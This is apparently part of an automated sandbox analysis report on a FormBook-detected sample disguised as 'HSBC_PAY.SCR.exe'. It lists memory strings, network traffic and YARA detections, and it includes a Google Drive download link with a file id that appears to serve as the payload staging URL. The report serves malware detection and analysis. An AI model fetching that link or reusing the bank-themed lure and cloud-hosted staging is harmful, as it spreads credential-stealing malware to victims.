                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1720114378.0000000021DE0000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1702719653.000000007EFEA000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000002.2056661280.00000000207C3000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp, uzonfntK.pif.0.drString found in binary or memory: http://www.pmail.com0
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002086D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8#
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=download
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.00000000005FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=downloadm
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1CR_4qd69QrL840hzlaewJykpuSo8ukf8&export=downlo
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: HSBC_PAY.SCR.exe PID: 6808, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uzonfntK.pif PID: 3548, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: uzonfntK.pif PID: 2844, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9824C NtReadVirtualMemory,0_2_02A9824C
